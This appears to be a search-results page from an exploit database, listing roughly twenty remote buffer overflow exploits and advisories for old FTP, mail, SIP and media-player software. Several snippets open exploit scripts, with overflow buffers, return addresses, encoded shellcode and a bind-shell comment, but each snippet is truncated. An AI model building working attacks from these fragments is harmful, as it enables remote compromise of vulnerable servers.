2039 matches found
ArGoSoft FTP Server 1.4.3.5 - Remote Buffer Overflow (PoC)
!/usr/bin/perl ---------------------------------------------------- ArgoSoftFTP.pl - PoC exploit for ArgoSoft FTP Server Jerome Athias ---------------------------------------------------- use Net::FTP; geting data $host = @ARGV0; $port = @ARGV1; $debug = @ARGV2; $user = @ARGV3; $pass = @ARGV4;...
[Full-disclosure] Winamp .m3u fun again ;)
Winamp .m3u Remote Buffer Overflow Vulnerability 0day by Sowhat Discovery: 2005.07.21 Pubulished: 2006.02.16 http://secway.org/advisory/AD20060216.txt Affected: Winamp All versions including 5.13 Overview: WinAMP is a popular media player that supports various media and playlist formats, includin...
eXchange POP3 5.0.050203 (rcpt to) Remote Buffer Overflow Exploit
No description provided by source. !/usr/bin/perl -w for educational purposes only . use IO::Socket; if $ARGV0 print "\n write the target IP!! \n\n"; exit; $buffer2 = "\x90"x1999999; $mailf= "mail"; $rcptt ="rcpt to:"; $buffer = "\x41"x4100; $ret = "\x80\x1d\xdc\x02"; $shellcode =...
eXchange POP3 5.0.050203 (rcpt to) Remote Buffer Overflow Exploit
Exploit for unknown platform in category remote exploits ================================================================= eXchange POP3 5.0.050203 rcpt to Remote Buffer Overflow Exploit ================================================================= !/usr/bin/perl -w for educational purposes...
Sami FTP Server 2.0.1 Remote Buffer Overflow Exploit (cpp)
No description provided by source. // Two includes. include fstream.h include winsock2.h // Project - Settings - Link Object/Library modules 'Ws232.lib' pragma commentlib, "ws232" char MyShellCode = // XOR by \x99\x99\x99\x99. "\xD9\xEE\xD9\x74\x24\xF4\x5B\x31\xC9\xB1\x59\x81\x73\x17\x99\x99"...
KarjaSoft Sami FTP Server 2.0.1 - Remote Buffer Overflow (cpp)
// Two includes. include include // Project - Settings - Link Object/Library modules 'Ws232.lib' pragma commentlib, "ws232" char MyShellCode = // XOR by \x99\x99\x99\x99. "\xD9\xEE\xD9\x74\x24\xF4\x5B\x31\xC9\xB1\x59\x81\x73\x17\x99\x99" "\x99\x99\x83\xEB\xFC\xE2" // Bind ShellCode port 777...
Winamp 5.12 - .pls Remote Buffer Overflow (1)
Winamp 5.12 - .pls Remote Buffer Overflow 1 / Winamp 5.12 Remote Buffer Overflow Universal Exploit Zero-Day Bug discovered & exploit coded by ATmaCA Web: http://www.spyinstructors.com && http://www.atmacasoft.com E-Mail: [email protected] Credit to Kozan / / Tested with : Winamp 5.12 on Win XP P...
Winamp <= 5.12 (Crafted PLS) Remote Buffer Overflow Expl (0-Day)
Exploit for unknown platform in category remote exploits =================================================================== Winamp include define BUFLEN 0x045D define PLAYLISTFILE "crafted.pls" char szPlayListHeader1 = "playlist\r\nFile1=\\"; char szPlayListHeader2 =...
Sami FTP Server 2.0.1 Remote Stack Based Buffer Overflow PoC
Exploit for unknown platform in category remote exploits ============================================================ Sami FTP Server 2.0.1 Remote Stack Based Buffer Overflow PoC ============================================================ !/usr/bin/perl Sami FTP Server v2.0.1 Remote notepad.exe...
Veritas NetBackup 45 - Volume Manager Daemon Remote Buffer Overflow
Veritas NetBackup 45 - Volume Manager Daemon Remote Buffer Overflow / DESCRIPTION Veritas NetBackup Stack Overflow tcp/13701 "Volume Manager Daemon" Module Advisories http://www.idefense.com/intelligence/vulnerabilities/display.php?id=336 http://www.frsirt.com/english/advisories/2005/2349 USAGE...
CounterPath eyeBeam 1.1 build 3010n - SIP Header Data Remote Buffer Overflow (2)
CounterPath eyeBeam 1.1 build 3010n - SIP Header Data Remote Buffer Overflow 2 // source: https://www.securityfocus.com/bid/16253/info A remote buffer-overflow vulnerability affects CounterPath eyeBeam because the application fails to properly validate the length of user-supplied strings prior to...
CounterPath eyeBeam 1.1 build 3010n - SIP Header Data Remote Buffer Overflow (2)
// source: https://www.securityfocus.com/bid/16253/info A remote buffer-overflow vulnerability affects CounterPath eyeBeam because the application fails to properly validate the length of user-supplied strings prior to copying them into static process buffers. An attacker may exploit this issue t...
eStara Softphone <= 3.0.1.46 (SIP) Remote Buffer Overflow Exploit
Exploit for unknown platform in category remote exploits ================================================================= eStara Softphone include unsigned char invite = 0x49, 0x4E, 0x56, 0x49, 0x54, 0x45, 0x20, 0x73, 0x69, 0x70, 0x3A, 0x61, 0x40, 0x31, 0x32, 0x37, 0x2E, 0x30, 0x2E, 0x30, 0x2E,...
Dual DHCP DNS Server 1.0 - DHCP Options Remote Buffer Overflow
source: https://www.securityfocus.com/bid/16298/info Dual DHCP DNS Server is prone to a remote buffer overflow vulnerability. The vulnerability presents itself when the server handles excessive data through the DHCP options field. Successful exploitation can allow attackers to trigger a denial of...
[Full-disclosure] Remote Buffer Overflow in Mailenable Enterprise 1.1
See-Security Research and Development. - Product Information MailEnable's mail server software provides a powerful, scalable hosted messaging platform for Microsoft Windows. MailEnable offers stability, unsurpassed flexibility and an extensive feature set which allows you to provide cost-effectiv...
MailEnable Enterprise Edition 1.1 - EXAMINE Remote Buffer Overflow
MailEnable Enterprise Edition 1.1 - EXAMINE Remote Buffer Overflow !/usr/bin/python Remote Mailenable Enterprise 1.1 EXAMINE buffer Overflow Discovered and exploited by [email protected] This vulnerability affects Mailenable Enterprise 1.1 without the ME-10009.EXE patch. Details: SEH gets...
ELOG Remote Buffer Overflow Vulnerabilities
The remote host appears to be using ELOG, a web-based electronic logbook application. The version of ELOG installed on the remote host crashes when it receives HTTP requests with excessive data for the 'mode' and 'cmd' parameters. An unauthenticated attacker may be able to exploit these issues to...
FTGate4 Groupware Mail Server 4.1 - imapd Remote Buffer Overflow (PoC)
FTGate4 Groupware Mail Server 4.1 - imapd Remote Buffer Overflow PoC !/usr/bin/perl use IO::Socket; print "\nFTGate Imapd BufferOverrun\nLuca Ercoli [email protected]\n"; print "http://www.lucaercoli.it\n\n\n"; $host = "localhost"; $remote = IO::Socket::INET-new Proto = "tcp", PeerAddr = $host,...
FTGate4 Groupware Mail Server 4.1 (imapd) Remote Buffer Overflow PoC
No description provided by source. !/usr/bin/perl use IO::Socket; print "\nFTGate Imapd BufferOverrun\nLuca Ercoli [email protected]\n"; print "http://www.lucaercoli.it\n\n\n"; $host = "localhost"; $remote = IO::Socket::INET-new Proto = "tcp", PeerAddr = $host, PeerPort = "143", ; unless $remote...
FTGate4 Groupware Mail Server 4.1 (imapd) Remote Buffer Overflow PoC
Exploit for unknown platform in category dos / poc ==================================================================== FTGate4 Groupware Mail Server 4.1 imapd Remote Buffer Overflow PoC ==================================================================== !/usr/bin/perl use IO::Socket; print...